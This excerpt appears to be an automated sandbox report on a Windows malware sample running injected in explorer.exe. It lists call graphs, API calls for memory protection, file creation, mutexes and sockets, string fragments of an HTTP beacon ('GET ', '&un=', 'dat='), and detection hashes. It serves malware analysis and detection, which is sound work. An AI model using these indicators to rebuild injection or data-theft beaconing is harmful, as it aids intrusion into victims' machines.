13585->13583 13588 80748f2 NtProtectVirtualMemory 13585->13588 13586->13524 13587->13585 13588->13583 13590 8078767 13589->13590 13591 80748f2 NtProtectVirtualMemory 13590->13591 13595 8078903 13590->13595 13592 80788e3 13591->13592 13593 80748f2 NtProtectVirtualMemory 13592->13593 13593->13595 13594 80789b7 13596 807b382 2 API calls 13594->13596 13597 80748f2 NtProtectVirtualMemory 13595->13597 13598 8078992 13595->13598 13599 80789bf 13596->13599 13597->13598 13598->13594 13600 80748f2 NtProtectVirtualMemory 13598->13600 13599->13524 13600->13594 13602 8074987 13601->13602 13605 80749b2 13602->13605 13616 8075622 13602->13616 13604 8074c0c 13604->13533 13605->13604 13606 8074ba2 13605->13606 13609 8074ac5 13605->13609 13607 8080e12 NtProtectVirtualMemory 13606->13607 13608 8074b5b 13607->13608 13608->13604 13611 8080e12 NtProtectVirtualMemory 13608->13611 13620 8080e12 13609->13620 13611->13604 13612 8074ae3 13612->13604 13613 8074b3d 13612->13613 13614 8080e12 NtProtectVirtualMemory 13612->13614 13615 8080e12 NtProtectVirtualMemory 13613->13615 13614->13613 13615->13608 13617 807567a 13616->13617 13618 8080e12 NtProtectVirtualMemory 13617->13618 13619 8075684 13617->13619 13618->13617 13619->13605 13621 8080e45 NtProtectVirtualMemory 13620->13621 13624 807f942 13620->13624 13623 8080e70 13621->13623 13623->13612 13625 807f967 13624->13625 13625->13621 13627 807b3c7 13626->13627 13632 807b232 13627->13632 13629 807b438 13636 807c632 13629->13636 13631 807be7b 13631->13542 13633 807b25e 13632->13633 13639 807a8c2 13633->13639 13635 807b26b 13635->13629 13637 807c66d 13636->13637 13638 807c68b WSAStartup 13636->13638 13637->13638 13638->13631 13640 807a934 13639->13640 13641 807a9a6 13640->13641 13642 807a995 ObtainUserAgentString 13640->13642 13641->13635 13642->13641 13871 8079ce2 13873 8079dd9 13871->13873 13872 807a022 13873->13872 13874 8079352 NtCreateFile 13873->13874 13875 8079f0d 13874->13875 13875->13872 13876 8079792 NtCreateFile 13875->13876 13876->13875 13788 807542e 13789 807545b 13788->13789 13796 80754c9 13788->13796 13790 807f232 NtCreateFile 13789->13790 13789->13796 13791 8075496 13790->13791 13792 80754c5 13791->13792 13794 8075082 NtCreateFile 13791->13794 13793 807f232 NtCreateFile 13792->13793 13792->13796 13793->13796 13795 80754b6 13794->13795 13795->13792 13797 8074f52 NtCreateFile 13795->13797 13797->13792 13911 807c72e 13912 807c76a 13911->13912 13913 807c788 connect 13911->13913 13912->13913 13798 807c62c 13799 807c66d 13798->13799 13800 807c68b WSAStartup 13798->13800 13799->13800 13801 807b22a 13802 807b25e 13801->13802 13803 807a8c2 ObtainUserAgentString 13802->13803 13804 807b26b 13803->13804 13877 80782f4 13879 8078349 13877->13879 13878 807849f 13880 80748f2 NtProtectVirtualMemory 13878->13880 13884 80784c3 13878->13884 13879->13878 13881 80748f2 NtProtectVirtualMemory 13879->13881 13880->13884 13882 8078480 13881->13882 13883 80748f2 NtProtectVirtualMemory 13882->13883 13883->13878 13885 8078597 13884->13885 13886 80748f2 NtProtectVirtualMemory 13884->13886 13887 80748f2 NtProtectVirtualMemory 13885->13887 13888 80785bf 13885->13888 13886->13885 13887->13888 13891 80786b9 13888->13891 13893 80748f2 NtProtectVirtualMemory 13888->13893 13889 80786e1 13890 807b382 2 API calls 13889->13890 13892 80786e9 13890->13892 13891->13889 13894 80748f2 NtProtectVirtualMemory 13891->13894 13893->13891 13894->13889 13643 807f232 13644 807f25c 13643->13644 13646 807f334 13643->13646 13645 807f410 NtCreateFile 13644->13645 13644->13646 13645->13646 13895 80740f1 13896 8074109 13895->13896 13900 80741d3 13895->13900 13897 8074012 6 API calls 13896->13897 13898 8074113 13897->13898 13899 807ff82 6 API calls 13898->13899 13898->13900 13899->13900 13981 80755f1 13982 8075606 13981->13982 13983 807560e 13981->13983 13984 807a662 6 API calls 13982->13984 13984->13983 13952 8077fbf 13954 8078016 13952->13954 13953 80780f0 13954->13953 13957 80780bb 13954->13957 13958 80748f2 NtProtectVirtualMemory 13954->13958 13955 80780e8 13956 807b382 2 API calls 13955->13956 13956->13953 13957->13955 13959 80748f2 NtProtectVirtualMemory 13957->13959 13958->13957 13959->13955 13831 807a8be 13832 807a8c3 13831->13832 13833 807a9a6 13832->13833 13834 807a995 ObtainUserAgentString 13832->13834 13834->13833 13934 807b37e 13935 807b3c7 13934->13935 13936 807b232 ObtainUserAgentString 13935->13936 13937 807b438 13936->13937 13938 807c632 WSAStartup 13937->13938 13939 807be7b 13938->13939 13985 80819f1 13986 80819f7 13985->13986 13989 8076852 13986->13989 13988 8081a0f 13990 8076865 13989->13990 13991 80768e4 13989->13991 13990->13991 13993 8076887 13990->13993 13995 807687e 13990->13995 13991->13988 13992 807c36f 13992->13988 13993->13991 13994 807a662 6 API calls 13993->13994 13994->13991 13995->13992 13996 807c0c2 6 API calls 13995->13996 13996->13992 13960 80819b3 13961 80819bd 13960->13961 13964 80766d2 13961->13964 13963 80819e0 13965 80766f7 13964->13965 13966 8076704 13964->13966 13967 80740f2 6 API calls 13965->13967 13968 80766ff 13966->13968 13969 807672d 13966->13969 13971 8076737 13966->13971 13967->13968 13968->13963 13973 807c2c2 13969->13973 13971->13968 13972 807ff82 6 API calls 13971->13972 13972->13968 13974 807c2df 13973->13974 13975 807c2cb 13973->13975 13974->13968 13975->13974 13976 807c0c2 6 API calls 13975->13976 13976->13974 13901 80780fb 13903 8078137 13901->13903 13902 80782d5 13903->13902 13904 80748f2 NtProtectVirtualMemory 13903->13904 13905 807828a 13904->13905 13906 80748f2 NtProtectVirtualMemory 13905->13906 13909 80782a9 13906->13909 13907 80782cd 13908 807b382 2 API calls 13907->13908 13908->13902 13909->13907 13910 80748f2 NtProtectVirtualMemory 13909->13910 13910->13907 13805 807e83a 13806 807e841 13805->13806 13807 807ff82 6 API calls 13806->13807 13809 807e8c5 13807->13809 13808 807e906 13809->13808 13810 807f232 NtCreateFile 13809->13810 13810->13808 13940 807ff7a 13942 807ffb8 13940->13942 13941 8080022 13942->13941 13943 807c5b2 socket 13942->13943 13945 8080081 13942->13945 13943->13945 13944 8080134 13944->13941 13946 807c732 connect 13944->13946 13950 80801b2 13944->13950 13945->13941 13945->13944 13947 8080117 getaddrinfo 13945->13947 13946->13950 13947->13944 13948 807c6b2 send 13951 8080729 13948->13951 13949 80807f4 setsockopt recv 13949->13941 13950->13941 13950->13948 13951->13941 13951->13949 13835 807c0b9 13836 807c1f0 13835->13836 13837 807c0ed 13835->13837 13837->13836 13838 807ff82 6 API calls 13837->13838 13838->13836

                                  Executed Functions

                                  Function 0807F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 313 807f232-807f256 314 807f8bd-807f8cd 313->314 315 807f25c-807f260 313->315 315->314 316 807f266-807f2a0 315->316 317 807f2a2-807f2a6 316->317 318 807f2bf 316->318 317->318 320 807f2a8-807f2ac 317->320 319 807f2c6 318->319 323 807f2cb-807f2cf 319->323 321 807f2b4-807f2b8 320->321 322 807f2ae-807f2b2 320->322 321->323 324 807f2ba-807f2bd 321->324 322->319 325 807f2d1-807f2f7 call 807f942 323->325 326 807f2f9-807f30b 323->326 324->323 325->326 330 807f378 325->330 326->330 331 807f30d-807f332 326->331 332 807f37a-807f3a0 330->332 333 807f334-807f33b 331->333 334 807f3a1-807f3a8 331->334 337 807f366-807f370 333->337 338 807f33d-807f360 call 807f942 333->338 335 807f3d5-807f3dc 334->335 336 807f3aa-807f3d3 call 807f942 334->336 341 807f410-807f458 NtCreateFile call 807f172 335->341 342 807f3de-807f40a call 807f942 335->342 336->330 336->335 337->330 339 807f372-807f373 337->339 338->337 339->330 348 807f45d-807f45f 341->348 342->330 342->341 348->330 350 807f465-807f46d 348->350 350->330 351 807f473-807f476 350->351 352 807f486-807f48d 351->352 353 807f478-807f481 351->353 354 807f4c2-807f4ec 352->354 355 807f48f-807f4b8 call 807f942 352->355 353->332 361 807f4f2-807f4f5 354->361 362 807f8ae-807f8b8 354->362 355->330 360 807f4be-807f4bf 355->360 360->354 363 807f604-807f611 361->363 364 807f4fb-807f4fe 361->364 362->330 363->332 365 807f500-807f507 364->365 366 807f55e-807f561 364->366 369 807f509-807f532 call 807f942 365->369 370 807f538-807f559 365->370 371 807f567-807f572 366->371 372 807f616-807f619 366->372 369->330 369->370 376 807f5e9-807f5fa 370->376 377 807f574-807f59d call 807f942 371->377 378 807f5a3-807f5a6 371->378 374 807f61f-807f626 372->374 375 807f6b8-807f6bb 372->375 382 807f657-807f66b call 8080e92 374->382 383 807f628-807f651 call 807f942 374->383 379 807f6bd-807f6c4 375->379 380 807f739-807f73c 375->380 376->363 377->330 377->378 378->330 385 807f5ac-807f5b6 378->385 386 807f6c6-807f6ef call 807f942 379->386 387 807f6f5-807f734 379->387 389 807f7c4-807f7c7 380->389 390 807f742-807f749 380->390 382->330 405 807f671-807f6b3 382->405 383->330 383->382 385->330 393 807f5bc-807f5e6 385->393 386->362 386->387 409 807f894-807f8a9 387->409 389->330 394 807f7cd-807f7d4 389->394 397 807f74b-807f774 call 807f942 390->397 398 807f77a-807f7bf 390->398 393->376 400 807f7d6-807f7f6 call 807f942 394->400 401 807f7fc-807f803 394->401 397->362 397->398 398->409 400->401 407 807f805-807f825 call 807f942 401->407 408 807f82b-807f835 401->408 405->332 407->408 408->362 414 807f837-807f83e 408->414 409->332 414->362 418 807f840-807f886 414->418 418->409
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: d8718386cc2b237ee352ae4d2ac08a5b680d8797b8c4dfb83e7b3cd258aa31e6
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: C6223C70A18A0A9FCB99EF28C4956AEF7E2FB58301F50462ED45ED7250DF30E452CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08080E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 457 8080e12-8080e38 458 8080e45-8080e6e NtProtectVirtualMemory 457->458 459 8080e40 call 807f942 457->459 460 8080e7d-8080e8f 458->460 461 8080e70-8080e7c 458->461 459->458
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 08080E67
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: 00e57465d816df9541aeee42de8662c2b46ddd71b9acb63e7008863a7cd3c18f
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: ED01B534668B484F8784EF6CD480166B7E4FBDD315F000B3EE59AC3250DB70C5414742
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08080E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 462 8080e0a-8080e6e call 807f942 NtProtectVirtualMemory 465 8080e7d-8080e8f 462->465 466 8080e70-8080e7c 462->466
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 08080E67
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: 3965299f0f098fb8699ec52b8f35112692eae78049723e5f24bc9b622907b851
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: E101A234628B884B8B48EB2C94412A6B3E5FBCE315F000B3EE9DAC3240DB31D5024782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 807ff82-807ffb6 1 807ffd6-807ffd9 0->1 2 807ffb8-807ffbc 0->2 4 80808fe-808090c 1->4 5 807ffdf-807ffed 1->5 2->1 3 807ffbe-807ffc2 2->3 3->1 6 807ffc4-807ffc8 3->6 7 807fff3-807fff7 5->7 8 80808f6-80808f7 5->8 6->1 9 807ffca-807ffce 6->9 10 807ffff-8080000 7->10 11 807fff9-807fffd 7->11 8->4 9->1 13 807ffd0-807ffd4 9->13 12 808000a-8080010 10->12 11->10 11->12 14 808003a-8080060 12->14 15 8080012-8080020 12->15 13->1 13->5 17 8080068-808007c call 807c5b2 14->17 18 8080062-8080066 14->18 15->14 16 8080022-8080026 15->16 16->8 19 808002c-8080035 16->19 24 8080081-80800a2 17->24 18->17 20 80800a8-80800ab 18->20 19->8 22 80800b1-80800b8 20->22 23 8080144-8080150 20->23 25 80800ba-80800dc call 807f942 22->25 26 80800e2-80800f5 22->26 27 80808ee-80808ef 23->27 28 8080156-8080165 23->28 24->20 24->27 25->26 26->27 30 80800fb-8080101 26->30 27->8 31 808017f-808018f 28->31 32 8080167-8080178 call 807c552 28->32 30->27 36 8080107-8080109 30->36 33 8080191-80801ad call 807c732 31->33 34 80801e5-808021b 31->34 32->31 43 80801b2-80801da 33->43 39 808022d-8080231 34->39 40 808021d-808022b 34->40 36->27 41 808010f-8080111 36->41 45 8080233-8080245 39->45 46 8080247-808024b 39->46 44 808027f-8080280 40->44 41->27 47 8080117-8080132 getaddrinfo 41->47 43->34 48 80801dc-80801e1 43->48 52 8080283-80802e0 call 8080d62 call 807d482 call 807ce72 call 8081002 44->52 45->44 49 808024d-808025f 46->49 50 8080261-8080265 46->50 47->23 51 8080134-808013c 47->51 48->34 49->44 53 808026d-8080279 50->53 54 8080267-808026b 50->54 51->23 63 80802e2-80802e6 52->63 64 80802f4-8080354 call 8080d92 52->64 53->44 54->52 54->53 63->64 65 80802e8-80802ef call 807d042 63->65 69 808035a-8080396 call 8080d62 call 8081262 call 8081002 64->69 70 808048c-80804b8 call 8080d62 call 8081262 64->70 65->64 85 8080398-80803b7 call 8081262 call 8081002 69->85 86 80803bb-80803e9 call 8081262 * 2 69->86 79 80804d9-8080590 call 8081262 * 3 call 8081002 * 2 call 807d482 70->79 80 80804ba-80804d5 70->80 111 8080595-80805b9 call 8081262 79->111 80->79 85->86 101 80803eb-8080410 call 8081002 call 8081262 86->101 102 8080415-808041d 86->102 101->102 103 808041f-8080425 102->103 104 8080442-8080448 102->104 108 8080467-8080487 call 8081262 103->108 109 8080427-808043d 103->109 110 808044e-8080456 104->110 104->111 108->111 109->111 110->111 115 808045c-808045d 110->115 120 80805bb-80805cc call 8081262 call 8081002 111->120 121 80805d1-80806ad call 8081262 * 7 call 8081002 call 8080d62 call 8081002 call 807ce72 call 807d042 111->121 115->108 132 80806af-80806b3 120->132 121->132 134 80806ff-808072d call 807c6b2 132->134 135 80806b5-80806fa call 807c382 call 807c7b2 132->135 145 808075d-8080761 134->145 146 808072f-8080735 134->146 155 80808e6-80808e7 135->155 147 808090d-8080913 145->147 148 8080767-808076b 145->148 146->145 151 8080737-808074c 146->151 157 8080779-8080784 147->157 158 8080919-8080920 147->158 152 80808aa-80808df call 807c7b2 148->152 153 8080771-8080773 148->153 151->145 156 808074e-8080754 151->156 152->155 153->152 153->157 155->27 156->145 163 8080756 156->163 159 8080795-8080796 157->159 160 8080786-8080793 157->160 158->160 164 808079c-80807a0 159->164 160->159 160->164 163->145 167 80807b1-80807b2 164->167 168 80807a2-80807af 164->168 170 80807b8-80807c4 167->170 168->167 168->170 173 80807f4-8080861 setsockopt recv 170->173 174 80807c6-80807ef call 8080d92 call 8080d62 170->174 177 80808a3-80808a4 173->177 178 8080863 173->178 174->173 177->152 178->177 179 8080865-808086a 178->179 179->177 182 808086c-8080872 179->182 182->177 185 8080874-80808a1 182->185 185->177 185->178
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: c898b972d41b24fa834168add50398d6d88f62c2189c652ba7c19b29c5fb4704
                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: 5F526D34614A08CBDB69EF68C4947E9B7E2FF54301F50462EC49FC7246EE70A58ACB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0807A9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: bc1c66dcb1ffab46af982a267f5ed1232edcf388f97b4c1756d2a74d363d1396
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: BA31B171A14A5C8BCB44EFA8C8847EEB7E2FF58216F40422AD45ED7340DE748645CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0807A9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 595aa93a0706b12d20e03a1cddd51798cad3b96d7a695067b485849896a65783
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 7C21D270A10A5D8BCB44FFA8C8847EEBBE2FF58206F40422AD45AD7340DF748645CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08076B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 8076b66-8076b68 233 8076b93-8076bb8 232->233 234 8076b6a-8076b6b 232->234 237 8076bbb-8076bbc 233->237 235 8076bbe-8076c22 call 807d612 call 807f942 * 2 234->235 236 8076b6d-8076b71 234->236 246 8076cdc 235->246 247 8076c28-8076c2b 235->247 236->237 238 8076b73-8076b92 236->238 237->235 238->233 249 8076cde-8076cf6 246->249 247->246 248 8076c31-8076cd3 call 8081da4 call 8081022 call 80813e2 call 8081022 call 80813e2 CreateMutexW 247->248 248->246 263 8076cd5-8076cda 248->263 263->249
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: a833c464ef8e2f506d5904e57bfcbbde1d723264f1448774614c91cb1bd5a37c
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: 8E414974918A0CCFDB94EFA8C8946E977E1FF68301F04427AC84EDB255DA309946CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08076B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: b072340120553c762446239dddcf56900df20a6e12c1a6f08eb519d81faf74b8
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: EF412674918A0C8FDB84EFA8C899BED77E1FF68301F04417AC84EDB255DA309946CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 293 807c72e-807c768 294 807c76a-807c782 call 807f942 293->294 295 807c788-807c7ab connect 293->295 294->295
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: 533f42c3dbbf9ef8caba28e176f065ace1e38b0d790cf8162beec1c7423af9ac
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: 5A014C30618B188FCB84EF1CE088B55B7E0EB58315F1545AE990DCB226CA74C8818BC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 298 807c732-807c768 299 807c76a-807c782 call 807f942 298->299 300 807c788-807c7ab connect 298->300 299->300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 13cd4e165c70899260ba7f03f282469d27de011a797fff4ae4e7cf7c8b958bc5
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: FD012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1541AEA90DCB226CB74C9818BC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 303 807c62c-807c66b 304 807c66d-807c685 call 807f942 303->304 305 807c68b-807c6a6 WSAStartup 303->305 304->305
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: WSAS$tart
                                  • API String ID: 724789610-2426239465
                                  • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                  • Instruction ID: 1c0f6886f1e1038b7396c2f511fdfa511a8f04994c0d52485c53ea85385a1617
                                  • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                  • Instruction Fuzzy Hash: 1D018B70919A188FCB44DF1CD488B69BBE0FB58312F2502ADD409CB266C7B0C9428B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 807c632-807c66b 309 807c66d-807c685 call 807f942 308->309 310 807c68b-807c6a6 WSAStartup 308->310 309->310
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID: WSAS$tart
                                  • API String ID: 724789610-2426239465
                                  • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                  • Instruction ID: 5f7625bd83424666c5aec5fb94b4744d2ea96438cf31675f465b30b30cdfc6f2
                                  • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                  • Instruction Fuzzy Hash: C9014B70519A188FCB84DF1C9088B69BBE0FB58351F2541A9E40DCB266C7B0C9428B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 421 807c6b2-807c6e5 422 807c6e7-807c6ff call 807f942 421->422 423 807c705-807c72d send 421->423 422->423
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.850934838.0000000008010000.00000040.80000000.00040000.00000000.sdmp, Offset: 08010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_8010000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: 9ef04705605b14c735fc0d82cc6e21fd00f3e0b47a77ddd2250be2e0b70dbbef
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: F1011270618A1C8FDBC4EF1CD048B6577E1EB58315F1545AED85DCB266CA70D881CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0807C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
